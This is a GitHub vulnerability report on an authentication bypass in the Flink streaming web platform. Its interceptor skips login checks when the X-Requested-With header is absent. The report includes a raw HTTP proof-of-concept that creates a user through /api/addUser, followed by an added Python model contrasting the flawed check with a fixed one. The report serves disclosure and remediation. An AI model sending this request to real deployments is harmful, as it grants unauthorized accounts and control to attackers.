zhp8341 / flink-streaming-platform-web

A real-time stream computing web platform based on Flink
MIT License

>=1.14.3 Permission bypass #107

Open v1f18 opened 7 months ago

v1f18 commented 7 months ago

[image]

In the interceptor, if it is not an AJAX request, the authentication will be canceled directly, resulting in a permission bypass.

[image]

In fact, the X-Requested-With: XMLHttpRequest check can be bypassed if the request header does not exist.

Test payload:

POST /api/addUser HTTP/1.1
Host: ***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://panflinkweb.lingzhuyun.com/static/ui/index.html
Content-Length: 50
Origin: ***
Connection: keep-alive
Cookie: flink-streaming-platform-web-sessionid=eyJuYW1lIjoidGVzdCIsInBhc3N3b3JkIjoiYTU5MGE3NDU5ODFlYjM0ZTU2ZWY5MzBmNDJkNjMzZDgiLCJ1c2VyaWQiOjJ9; Admin-Token={%22id%22:2%2C%22username%22:%22test%22%2C%22name%22:%22test%22%2C%22avatar%22:%22avatar.gif%22%2C%22introduction%22:%22%22%2C%22roles%22:[%22admin%22]}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Cache-Control: no-cache
name=test3&fullname=test&pwd1=test321&pwd2=test321

[image]
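To make the reported logic concrete, the following is an added Python model of the interceptor check; it is neither the project's Java interceptor nor the reporter's code. The vulnerable branch skips the session check whenever the X-Requested-With header is missing, which is the behaviour the report describes, and the hardened version validates the session on every request and uses the AJAX flag only to choose how a rejection is reported. The header names, the session store, the cookie values and the sample request are all constructed assumptions.

```python
# Added illustrative model of the interceptor flaw from the issue report
# (not the project's own code). Header names, the session lookup and all
# sample requests below are constructed assumptions.

AJAX_HEADER = "x-requested-with"
AJAX_VALUE = "XMLHttpRequest"
SESSION_COOKIE = "flink-streaming-platform-web-sessionid"
VALID_SESSIONS = {"VALID-SESSION-ID"}   # constructed stand-in for a server-side session store


def parse_raw_request(text):
    """Parse a raw HTTP/1.1 request (as pasted in the issue) into
    (method, path, headers, body). Header names are lower-cased because
    HTTP header names are case-insensitive."""
    head, _, body = text.partition("\n\n")
    lines = head.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def session_cookie(headers):
    """Return the session id carried in the Cookie header, or None."""
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == SESSION_COOKIE:
            return value
    return None


def vulnerable_pre_handle(headers):
    """Logic as described in the report: the session check only runs for
    AJAX requests, so a request without the header is let straight through."""
    if headers.get(AJAX_HEADER) != AJAX_VALUE:
        return True                    # interceptor stops checking here
    return session_cookie(headers) in VALID_SESSIONS


def fixed_pre_handle(headers):
    """Hardened form: the session check runs for every request to the API.
    Whether the caller is AJAX never decides whether to authenticate."""
    return session_cookie(headers) in VALID_SESSIONS


def failure_style(headers):
    """Only the presentation of a rejection may depend on the AJAX header
    (JSON error body for AJAX callers, redirect to the login page otherwise)."""
    return "json" if headers.get(AJAX_HEADER) == AJAX_VALUE else "redirect"


# Constructed request in the shape of the issue's payload: a POST to an admin
# API with a cookie that is not a valid session and no X-Requested-With header.
RAW_NON_AJAX = """POST /api/addUser HTTP/1.1
Host: example.invalid
Cookie: {cookie}=NOT-A-VALID-SESSION; Admin-Token=whatever
Content-Type: application/x-www-form-urlencoded

name=test3&fullname=test&pwd1=test321&pwd2=test321""".format(cookie=SESSION_COOKIE)


def run_cases():
    """Return {case: (vulnerable_allows, fixed_allows)} for three constructed
    requests: the issue's non-AJAX request, the same request with the AJAX
    header added, and an AJAX request carrying a valid session."""
    _, _, no_header, _ = parse_raw_request(RAW_NON_AJAX)
    ajax_bad_session = {**no_header, AJAX_HEADER: AJAX_VALUE}
    ajax_valid_session = {**ajax_bad_session,
                          "cookie": f"{SESSION_COOKIE}=VALID-SESSION-ID"}
    cases = {
        "no_header_bad_session": no_header,
        "ajax_header_bad_session": ajax_bad_session,
        "ajax_header_valid_session": ajax_valid_session,
    }
    return {name: (vulnerable_pre_handle(h), fixed_pre_handle(h))
            for name, h in cases.items()}


if __name__ == "__main__":
    for name, (vuln, fixed) in run_cases().items():
        print(f"{name:28s} vulnerable={'ALLOW' if vuln else 'deny':5s} "
              f"fixed={'ALLOW' if fixed else 'deny'}")
```

Running the block shows that only the vulnerable interceptor lets the header-less request with an invalid session through; both versions agree on the two AJAX cases, which is what a regression test for the fix should assert.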